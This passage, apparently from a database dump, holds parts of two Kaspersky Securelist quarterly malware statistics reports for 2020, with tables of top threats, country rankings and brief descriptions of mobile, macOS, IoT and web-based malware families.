2020. No full-on network attacks that exploited new vulnerabilities in network exchange protocols were detected. However, software developers did discover and fix several vulnerabilities in popular network services. Among the most interesting ones were [CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>) for SMBv1, which allowed the attacker to execute code remotely on a target system. [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SmbGhost), a popular SMBv3 vulnerability among researchers, received unexpected follow-up in the form of an exploit that allowed compromising the system without interacting with the user. The same protocol version was found to contain an error, designated as [CVE-2020-1206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>) and known as the SMBleed vulnerability, which allowed the attacker to get a portion of the Windows kernel memory. The researchers even published several exploit versions that used a bundle of SMBleed and SMBGhost to execute the code with system privileges. In that mode, the attacker can install any software and access any information on the computer.\n\n## Attacks on Apple macOS\n\nIn Q2 2020, we discovered new versions of previously known threats and one new backdoor, which received the verdict of Backdoor.OSX.Lador.a. The malware is notable for being written in Go, a language gaining popularity as a means to create malware aimed at the macOS platform. If you compare the size of the Lador file with any backdoor created in Objective C, the difference will be very significant: the size of a Lador file is 5.5 megabytes, i.e. many times larger. And all this for the sake of remote access to the infected machine and execution of arbitrary code downloaded from the control center.\n\n**Top 20 threats for macOS **\n\n| Verdict | %* \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 17.39 \n2 | Trojan-Downloader.OSX.Shlayer.a | 12.07 \n3 | AdWare.OSX.Pirrit.j | 9.10 \n4 | AdWare.OSX.Bnodlero.at | 8.21 \n5 | AdWare.OSX.Cimpli.k | 7.32 \n6 | AdWare.OSX.Pirrit.o | 5.57 \n7 | Trojan-Downloader.OSX.Agent.h | 4.19 \n8 | AdWare.OSX.Ketin.h | 4.03 \n9 | AdWare.OSX.Pirrit.x | 4.00 \n10 | AdWare.OSX.Spc.a | 3.98 \n11 | AdWare.OSX.Amc.c | 3.97 \n12 | Backdoor.OSX.Lador.a | 3.91 \n13 | AdWare.OSX.Pirrit.v | 3.22 \n14 | RiskTool.OSX.Spigot.a | 2.89 \n15 | AdWare.OSX.Bnodlero.t | 2.87 \n16 | AdWare.OSX.Cimpli.f | 2.85 \n17 | AdWare.OSX.Adload.g | 2.60 \n18 | AdWare.OSX.Pirrit.aa | 2.54 \n19 | AdWare.OSX.MacSearch.d | 2.44 \n20 | AdWare.OSX.Adload.h | 2.35 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nThe rankings of the most common threats for the macOS platform has not changed much compared to the previous quarter and is still largely made up of adware. As in Q1 2020, Shlayer (12.07%) was the most common Trojan. That malware loads adware from the Pirrit, Bnodlero and Cimpli families, which populate our TOP 20.\n\nThe Lador.a backdoor, which we mentioned above, entered the rankings along with adware.\n\nFinally, in Q2 2020, a group of potentially unwanted programs collectively detected as HistGrabber.b joined the rankings. The main purpose of such software is to unpack archives, but HistGrabber.b also quietly uploaded the user's browsing history to the developer's servers. This is [nothing new](<https://www.pcworld.com/article/3516502/report-avast-and-avg-collect-and-sell-your-personal-info-via-their-free-antivirus-programs.html>): all applications that steal browsing history have long been withdrawn from the App Store, and servers that could receive the data, disabled. Nevertheless, we deem it necessary to inform users of any such software discovered on their devices.\n\n### Threat geography\n\n_Threat geography for the macOS platform, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105816/25-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Spain | 9.82% \n2 | France | 7.73% \n3 | Mexico | 6.70% \n4 | Italy | 6.54% \n5 | India | 6.47% \n6 | Canada | 6.34% \n7 | Brazil | 6.25% \n8 | USA | 5.99% \n9 | United Kingdom | 5.90% \n10 | Russia | 5.77% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for MacOS (under 5,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky security solutions for MacOS in the same country._\n\nThe most common threats in all the countries on the list without exception bundled various adware with the Shlayer Trojan.\n\n## IoT attacks\n\n### IoT threat statistics\n\nQ2 2020 saw no dramatic change in cybercriminal activity targeting IoT devices: attackers most frequently ran Telnet login and password brute-force campaigns.\n\nTelnet | 80.83% \n---|--- \nSSH | 19.17% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2020_\n\nFurther communication with IoT devices that pretended to be infected (and actually traps), was much more often conducted via Telnet.\n\nTelnet | 71.52% \n---|--- \nSSH | 28.48% \n \n_Distribution of cybercriminals' working sessions with Kaspersky traps, Q2 2020_\n\n_Geography of IP addresses of device from which attacks on Kaspersky Telnet traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105906/26-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries by location of devices from which Telnet-based attacks were carried out on Kaspersky traps**\n\n**Country** | **%*** \n---|--- \nChina | 12.75% \nBrazil | 11.88% \nEgypt | 8.32% \nTaiwan | 6.58% \nIran | 5.17% \nIndia | 4.84% \nRussia | 4.76% \nVietnam | 3.59% \nGreece | 3.22% \nUSA | 2.94% \n \n_* Share of devices from which attacks were carried out in the country out of the total number of devices_\n\nThe three countries with the most devices that launched attacks on Kaspersky Telnet traps remained virtually unchanged. China (12.75%) was first, while Brazil (11.88%) and Egypt (8.32%) swapped positions.\n\n_Geography of IP addresses of device from which attacks on Kaspersky SSH traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105939/27-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries by location of devices from which SSH-based attacks were carried out on Kaspersky traps**\n\n**Country** | **%*** \n---|--- \nChina | 22.12% \nUSA | 10.91% \nVietnam | 8.20% \nBrazil | 5.34% \nGermany | 4.68% \nRussia | 4.44% \nFrance | 3.42% \nIndia | 3.01% \nEgypt | 2.77% \nSingapore | 2.59% \n \n_* Share of devices from which attacks were carried out in the country out of the total number of devices_\n\nAs with Telnet, the three countries where the most attacks on SSH traps originated remained unchanged from Q1 2020: China (22.12%), U.S. (10.91%) and Vietnam (8.20%).\n\n### Threats loaded into traps\n\n**Verdict** | **%*** \n---|--- \nTrojan-Downloader.Linux.NyaDrop.b | 32.78 \nBackdoor.Linux.Mirai.b | 17.47 \nHEUR:Backdoor.Linux.Mirai.b | 12.72 \nHEUR:Backdoor.Linux.Gafgyt.a | 9.76 \nBackdoor.Linux.Mirai.ba | 7.99 \nHEUR:Backdoor.Linux.Mirai.ba | 4.49 \nBackdoor.Linux.Gafgyt.bj | 2.23 \nHEUR:Trojan-Downloader.Shell.Agent.p | 1.66 \nBackdoor.Linux.Mirai.cn | 1.26 \nHEUR:Backdoor.Linux.Mirai.c | 0.73 \n \n_* Share of the malware type in the total amount of malware downloaded to IoT devices following a successful attack._\n\nAs in the first quarter, the NyaDrop Trojan led by the number of loads onto traps. The Mirai Trojan family retained its relevance in Q2 2020, occupying half of our IoT threat rankings.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C2 centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q2 2020, Kaspersky solutions defeated 899,744,810 attacks launched from online resources located in 191 countries across the globe. A total of 286,229,445 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110037/28-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the share of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **_Malware class_**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Algeria | 11.2052 \n2 | Mongolia | 11.0337 \n3 | Albania | 9.8699 \n4 | France | 9.8668 \n5 | Tunisia | 9.6513 \n6 | Bulgaria | 9.5252 \n7 | Libya | 8.5995 \n8 | Morocco | 8.4784 \n9 | Greece | 8.3735 \n10 | Vietnam | 8.2298 \n11 | Somalia | 8.0938 \n12 | Georgia | 7.9888 \n13 | Malaysia | 7.9866 \n14 | Latvia | 7.8978 \n15 | UAE | 7.8675 \n16 | Qatar | 7.6820 \n17 | Angola | 7.5147 \n18 | R\u00e9union | 7.4958 \n19 | Laos | 7.4757 \n20 | Mozambique | 7.4702 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a share of all unique Kaspersky users in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 5.73% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110110/29-en-malware_q2-2020_stats_non-mobile.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs included in complex installers, encrypted files, etc.)._\n\nIn Q2 2020, our File Anti-Virus detected **80,993,511** malware and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 48.0224 \n2 | Uzbekistan | 42.2632 \n3 | Tajikistan | 42.1279 \n4 | Ethiopia | 41.7213 \n5 | Afghanistan | 40.6278 \n6 | Myanmar | 39.1377 \n7 | Burkina Faso | 37.4560 \n8 | Benin | 37.4390 \n9 | China | 36.7346 \n10 | Kyrgyzstan | 36.0847 \n11 | Vietnam | 35.4327 \n12 | Mauritania | 34.2613 \n13 | Laos | 34.0350 \n14 | Mongolia | 33.6261 \n15 | Burundi | 33.4323 \n16 | Belarus | 33.0937 \n17 | Guinea | 33.0097 \n18 | Mali | 32.9902 \n19 | Togo | 32.6962 \n20 | Cameroon | 32.6347 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n__** Unique users on whose computers **Malware-class** local threats were blocked, as a share of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110144/30-en-malware_q2-2020_stats_non-mobile.png>))_\n\nOverall, 17.05% of user computers globally faced at least one **Malware-class** local threat during Q2 2020.", "cvss3": {}, "published": "2020-09-03T10:30:23", "type": "securelist", "title": "IT threat evolution Q2 2020. PC statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2020-0796", "CVE-2020-1206", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1425", "CVE-2020-1457", "CVE-2020-6819", "CVE-2020-6820"], "modified": "2020-09-03T10:30:23", "id": "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "href": "https://securelist.com/it-threat-evolution-q2-2020-pc-statistics/98292/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-20T11:49:25", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n_These statistics are based on detection verdicts for Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 726,536,269 attacks launched from online resources in 203 countries across the globe.\n * A total of 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 249,748 unique users.\n * Ransomware attacks were defeated on the computers of 178,922 unique users.\n * Our File Anti-Virus detected 164,653,290 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 1,152,662 malicious installation packages\n * 42,115 installation packages for mobile banking trojans\n * 4339 installation packages for mobile ransomware trojans\n\n## Mobile threats\n\n### Quarter events\n\nQ1 2020 will be remembered primarily for the coronavirus pandemic and cybercriminals' exploitation of the topic. In particular, the creators of a new modification of the Ginp banking trojan renamed their malware Coronavirus Finder and then began offering it for \u20ac0.75 disguised as an app supposedly capable of detecting nearby people infected with COVID-19. Thus, the cybercriminals tried not only to scam users by exploiting hot topics, but to gain access to their bank card details. And, because the trojan remains on the device after stealing this data, the cybercriminals could intercept text messages containing two-factor authorization codes and use the stolen data without the victim's knowledge.\n\nAnother interesting find this quarter was [Cookiethief](<https://securelist.com/cookiethief/96332/>), a trojan designed to steal cookies from mobile browsers and the Facebook app. In the event of a successful attack, the malware provided its handler with access to the victim's account, including the ability to perform various actions in their name, such as liking, reposting, etc. To prevent the service from spotting any abnormal activity in the hijacked profile, the trojan contains a proxy module through which the attackers issue commands.\n\nThe third piece of malware that caught our attention this reporting quarter was trojan-Dropper.AndroidOS.Shopper.a. It is designed to [help cybercriminals to leave fake reviews and drive up ratings on Google Play](<https://securelist.com/smartphone-shopaholic/95544/>). The attackers' goals here are obvious: to increase the changes of their apps getting published and recommended, and to lull the vigilance of potential victims. Note that to rate apps and write reviews, the trojan uses Accessibility Services to gain full control over the other app: in this case, the official Google Play client.\n\n### Mobile threat statistics\n\nIn Q1 2020, Kaspersky's mobile products and technologies detected 1,152,662 malicious installation packages, or 171,669 more than in the previous quarter.\n\n_Number of malicious installation packages detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13193928/sl_malware_report_01-kolichestvo-obnaruzhennyh-vredonosnyh-ustanovochnyh-paketov-q1-2019-q1-2019.png>)_\n\nStarting in Q2 2019, we have seen a steady rise in the number of mobile threats detected. Although it is too early to sound the alarm (2019 saw the lowest number of new threats in recent years), the trend is concerning.\n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile programs by type, Q1 2020 and Q4 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194010/sl_malware_report_02-en-mobile-behavior.png>)_\n\nOf all the threats detected in Q1, half were unwanted adware apps (49.9%), their share having increased by 19 p.p. compared to the previous quarter. Most often, we detected members of the HiddenAd and Ewind families, with a combined slice of 40% of all detected adware threats, as well as the FakeAdBlocker family (12%).\n\nPotentially unwanted RiskTool apps (28.24%) took second place; the share of this type of threat remained almost unchanged. The Smsreg (49% of all detected threats of this class), Agent (17%) and Dnotua (11%) families were the biggest contributors. Note that in Q1, the number of detected members of the Smsreg family increased by more than 50 percent.\n\nIn third place were Trojan-Dropper-type threats (9.72%). Although their share decreased by 7.63 p.p. against the previous quarter, droppers remain one of the most common classes of mobile threats. Ingopack emerged as Q1's leading family with a massive 71% of all Trojan-Dropper threats, followed by Waponor (12%) and [Hqwar](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) (8%) far behind.\n\nIt is worth noting that mobile droppers are most often used for installing financial malware, although some financial threats can spread without their help. The share of these self-sufficient threats is quite substantial: in particular, the share of Trojan-Banker in Q1 increased by 2.1 p.p. to 3.65%.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rankings do not include potentially dangerous or unwanted programs such as RiskTool or adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.89 \n2 | Trojan.AndroidOS.Boogr.gsh | 9.09 \n3 | DangerousObject.AndroidOS.GenericML | 7.08 \n4 | Trojan-Downloader.AndroidOS.Necro.d | 4.52 \n5 | Trojan.AndroidOS.Hiddapp.ch | 2.73 \n6 | Trojan-Downloader.AndroidOS.Helper.a | 2.45 \n7 | Trojan.AndroidOS.Handda.san | 2.31 \n8 | Trojan-Dropper.AndroidOS.Necro.z | 2.30 \n9 | Trojan.AndroidOS.Necro.a | 2.19 \n10 | Trojan-Downloader.AndroidOS.Necro.b | 1.94 \n11 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.82 \n12 | Trojan-Dropper.AndroidOS.Helper.l | 1.50 \n13 | Exploit.AndroidOS.Lotoor.be | 1.46 \n14 | Trojan-Dropper.AndroidOS.Lezok.p | 1.46 \n15 | Trojan-Banker.AndroidOS.Rotexy.e | 1.43 \n16 | Trojan-Dropper.AndroidOS.Penguin.e | 1.42 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.39 \n18 | Trojan.AndroidOS.Dvmap.a | 1.24 \n19 | Trojan.AndroidOS.Agent.rt | 1.21 \n20 | Trojan.AndroidOS.Vdloader.a | 1.18 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products that were attacked._\n\nFirst place in our Top 20 as ever went to DangerousObject.Multi.Generic (44.89%), the verdict we use for malware detected [using cloud technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). They are triggered when the antivirus databases still lack the data for detecting a malicious program, but the Kaspersky Security Network cloud already contains information about the object. This is basically how the latest malware is detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.09%) and DangerousObject.AndroidOS.GenericML (7,08%) respectively. These verdicts are assigned to files that are recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nIn fourth (Trojan-Downloader.AndroidOS.Necro.d, 4.52%) and tenth (Trojan-Downloader.AndroidOS.Necro.b, 1.94%) places are members of the Necro family, whose main task is to download and install modules from cybercriminal servers. Eighth-placed Trojan-Dropper.AndroidOS.Necro.z (2.30%) acts in a similar way, extracting from itself only those modules that it needs. As for Trojan.AndroidOS.Necro.a, which took ninth place (2.19%), cybercriminals assigned it a different task: the trojan follows advertising links and clicks banner ads in the victim's name.\n\nTrojan.AndroidOS.Hiddapp.ch (2.73%) claimed fifth spot. As soon as it runs, the malware hides its icon on the list of apps and continues to operate in the background. The trojan's payload can be other trojan programs or adware apps.\n\nSixth place went to Trojan-Downloader.AndroidOS.Helper.a (2.45%), which is what Trojan-Downloader.AndroidOS.Necro usually delivers. Helper.a is tasked with downloading arbitrary code from the cybercriminals' server and running it.\n\nThe verdict Trojan.AndroidOS.Handda.san (2.31%) in seventh place is a group of diverse trojans that hide their icons, gain Device Admin rights on the device, and use packers to evade detection.\n\nTrojan-Banker.AndroidOS.Rotexy.e (1.43%) and Trojan-Dropper.AndroidOS.Penguin.e (1.42%) warrant a special mention. The former is the only banking trojan in the top 20 this past quarter. The Rotexy family is all of six years old, and its members have the functionality to steal bank card details and intercept two-factor payment authorization messages. In turn, the first member of the Penguin dropper family was only detected last July and had gained significant popularity by Q1 2020.\n\n### Geography of mobile threats\n\n \n\n_Map of infection attempts by mobile malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194110/sl_malware_report_03-en-mobile-all-map.png>)_\n\n**Top 10 countries by share of users attacked by mobile threats**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Iran | 39.56 \n2 | Algeria | 21.44 \n3 | Bangladesh | 18.58 \n4 | Nigeria | 15.58 \n5 | Lebanon | 15.28 \n6 | Tunisia | 14.94 \n7 | Pakistan | 13.99 \n8 | Kuwait | 13.91 \n9 | Indonesia | 13.81 \n10 | Cuba | 13.62 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky mobile products in the country._\n\nIn Q1 2020, the leader by share of attacked users was Iran (39.56%). Inhabitants of this country most frequently encountered adware apps from the Notifyer family, as well as Telegram clone apps. In second place was Algeria (21.44%), where adware apps were also distributed, but this time it was the HiddenAd and FakeAdBlocker families. Third place was taken by Bangladesh (18.58%), where half of the top 10 mobile threats consisted of adware in the HiddenAd family.\n\n### Mobile banking trojans\n\nDuring the reporting period, we detected **42,115** installation packages of mobile banking trojans. This is the highest value in the past 18 months, and more than 2.5 times higher than in Q4 2019. The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Agent (42.79% of all installation packages detected), Trojan-Banker.AndroidOS.Wroba (16.61%), and Trojan-Banker.AndroidOS.Svpeng (13.66%) families.\n\n_Number of installation packages of mobile banking trojans detected by Kaspersky, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194342/sl_malware_report_04-kolichestvo-ustanovochnyh-paketov-mobilnyh-bankovskih-troyancev-q1-2019-q1-2019.png>)_\n\n**Top 10 mobile banking trojans**\n\n_ _ | **Verdict** | **%*** \n---|---|--- \n_1_ | Trojan-Banker.AndroidOS.Rotexy.e | 13.11 \n_2_ | Trojan-Banker.AndroidOS.Svpeng.q | 10.25 \n_3_ | Trojan-Banker.AndroidOS.Asacub.snt | 7.64 \n_4_ | Trojan-Banker.AndroidOS.Asacub.ce | 6.31 \n_5_ | Trojan-Banker.AndroidOS.Agent.eq | 5.70 \n_6_ | Trojan-Banker.AndroidOS.Anubis.san | 4.68 \n_7_ | Trojan-Banker.AndroidOS.Agent.ep | 3.65 \n_8_ | Trojan-Banker.AndroidOS.Asacub.a | 3.50 \n_9_ | Trojan-Banker.AndroidOS.Asacub.ar | 3.00 \n_10_ | Trojan-Banker.AndroidOS.Agent.cf | 2.70 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by banking threats._\n\nFirst and second places in our top 10 were claimed by trojans targeted at Russian-speaking mobile users: Trojan-Banker.AndroidOS.Rotexy.e (13.11%) and Trojan-Banker.AndroidOS.Svpeng.q (10.25%).\n\nThird, fourth, eighth, and ninth positions in the top 10 mobile banking threats went to members of the Asacub family. The cybercriminals behind this trojan stopped creating new samples, but its distribution channels were still active in Q1.\n\n_Geography of mobile banking threats, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194517/sl_malware_report_05-en-mobile-banker-map.png>)_\n\n**Top 10 countries by share of users attacked by mobile banking trojans**\n\n| Country* | %** \n---|---|--- \n1 | Japan | 0.57 \n2 | Spain | 0.48 \n3 | Italy | 0.26 \n4 | Bolivia | 0.18 \n5 | Russia | 0.17 \n6 | Turkey | 0.13 \n7 | Tajikistan | 0.13 \n8 | Brazil | 0.11 \n9 | Cuba | 0.11 \n10 | China | 0.10 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked by mobile banking trojans as a percentage of all users of Kaspersky mobile products in the country._\n\nIn Q1 2020, Japan (0.57%) had the largest share of users attacked by mobile bankers; the vast majority of cases involved Trojan-Banker.AndroidOS.Agent.eq.\n\nIn second place came Spain (0.48%), where in more than half of all cases, we detected malware from the Trojan-Banker.AndroidOS.Cebruser family, and another quarter of detections were members of the Trojan-Banker.AndroidOS.Ginp family.\n\nThird place belonged to Italy (0.26%), where, as in Spain, the Trojan-Banker.AndroidOS.Cebruser family was the most widespread with almost two-thirds of detections.\n\nIt is worth saying a bit more about the Cebruser family. Its creators were among the first to exploit the coronavirus topic to spread the malware.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13183112/sl_malware_report.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13183112/sl_malware_report.png>)When it runs, the trojan immediately gets down to business: it requests access to Accessibility Services to obtain Device Admin permissions, and then tries to get hold of card details.\n\nThe malware is distributed under the [Malware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) model; its set of functions is standard for such threats, but with one interesting detail \u2014 the use of a step-counter for activation so as to bypass dynamic analysis tools ([sandbox](<https://encyclopedia.kaspersky.com/glossary/sandbox/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)). Cebruser targets the mobile apps of banks in various countries and popular non-financial apps; its main weapons are phishing windows and interception of two-factor authorization. In addition, the malware can block the screen using a ransomware tool and intercept keystrokes on the virtual keyboard.\n\n### Mobile ransomware trojans\n\nIn Q2 2020, we detected **4,339** installation packages of mobile trojan ransomware, 1,067 fewer than in the previous quarter.\n\n_Number of installation packages of mobile ransomware trojans detected by Kaspersky, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194615/sl_malware_report_06-kolichestvo-ustanovochnyh-paketov-mobilnyh-troyancev-vymogatelej-q1-2018-q1-2019.png>)_\n\n**Top 10 mobile ransomware trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 17.08 \n2 | Trojan-Ransom.AndroidOS.Congur.e | 12.70 \n3 | Trojan-Ransom.AndroidOS.Small.as | 11.41 \n4 | Trojan-Ransom.AndroidOS.Rkor.k | 9.88 \n5 | Trojan-Ransom.AndroidOS.Small.as | 7.32 \n6 | Trojan-Ransom.AndroidOS.Small.o | 4.79 \n7 | Trojan-Ransom.AndroidOS.Svpeng.aj | 3.62 \n8 | Trojan-Ransom.AndroidOS.Svpeng.ah | 3.55 \n9 | Trojan-Ransom.AndroidOS.Congur.e | 3.32 \n10 | Trojan-Ransom.AndroidOS.Fusob.h | 3.17 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by ransomware trojans._\n\nOver the past few quarters, the number of ransomware trojans detected has been gradually decreasing; all the same, we continue to detect quite a few infection attempts by this class of threats. The main contributors to the statistics were the Svpeng, Congur, and Small ransomware families.\n\n_Geography of mobile ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194659/sl_malware_report_07-en-mobile-ransom-map.png>)_\n\nTop 10 countries by share of users attacked by mobile ransomware trojans:\n\n| **Country*** | **%**** \n---|---|--- \n1 | USA | 0.26 \n2 | Kazakhstan | 0.25 \n3 | Iran | 0.16 \n4 | China | 0.09 \n5 | Saudi Arabia | 0.08 \n6 | Italy | 0.03 \n7 | Mexico | 0.03 \n8 | Canada | 0.03 \n9 | Indonesia | 0.03 \n10 | Switzerland | 0.03 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked by mobile ransomware trojans as a percentage of all users of Kaspersky mobile products in the country._\n\nThe leaders by number of users attacked by mobile ransomware trojans are Syria (0.28%), the United States (0.26%) and Kazakhstan (0.25%)\n\n## Attacks on Apple macOS\n\nIn Q1 2020, we detected not only new versions of common threats, but one new backdoor family, whose first member was Backdoor.OSX.Capip.a. The malware's operating principle is simple: it calls the C&C for a shell script, which it then downloads and executes.\n\n### Top 20 threats to macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 19.27 \n2 | AdWare.OSX.Pirrit.j | 10.34 \n3 | AdWare.OSX.Cimpli.k | 6.69 \n4 | AdWare.OSX.Ketin.h | 6.27 \n5 | AdWare.OSX.Pirrit.aa | 5.75 \n6 | AdWare.OSX.Pirrit.o | 5.74 \n7 | AdWare.OSX.Pirrit.x | 5.18 \n8 | AdWare.OSX.Spc.a | 4.56 \n9 | AdWare.OSX.Cimpli.f | 4.25 \n10 | AdWare.OSX.Bnodlero.t | 4.08 \n11 | AdWare.OSX.Bnodlero.x | 3.74 \n12 | Hoax.OSX.SuperClean.gen | 3.71 \n13 | AdWare.OSX.Cimpli.h | 3.37 \n14 | AdWare.OSX.Pirrit.v | 3.30 \n15 | AdWare.OSX.Amc.c | 2.98 \n16 | AdWare.OSX.MacSearch.d | 2.85 \n17 | RiskTool.OSX.Spigot.a | 2.84 \n18 | AdWare.OSX.Pirrit.s | 2.80 \n19 | AdWare.OSX.Ketin.d | 2.76 \n20 | AdWare.OSX.Bnodlero.aq | 2.70 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked_\n\nThe top 20 threats for macOS did not undergo any major changes in Q1 2020. The adware trojan Shlayer.a (19.27%) still tops the leaderboard, followed by objects that Shlayer itself loads into the infected system, in particular, numerous adware apps from the Pirrit family.\n\nInterestingly, the unwanted program Hoax.OSX.SuperClean.gen landed in 12th place on the list. Like other Hoax-type programs, it is distributed under the guise of a system cleanup app, and immediately after installation, scares the user with problems purportedly found in the system, such as gigabytes of trash on the hard drive.\n\n### Threat geography\n\n| **Country*** | **%**** \n---|---|--- \n1 | Spain | 7.14 \n2 | France | 6.94 \n3 | Italy | 5.94 \n4 | Canada | 5.58 \n5 | USA | 5.49 \n6 | Russia | 5.10 \n7 | India | 4.88 \n8 | Mexico | 4.78 \n9 | Brazil | 4.65 \n10 | Belgium | 4.65 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 5,000)_ \n_** Unique users who encountered macOS threats as a percentage of all users of Kaspersky security solutions for macOS in the 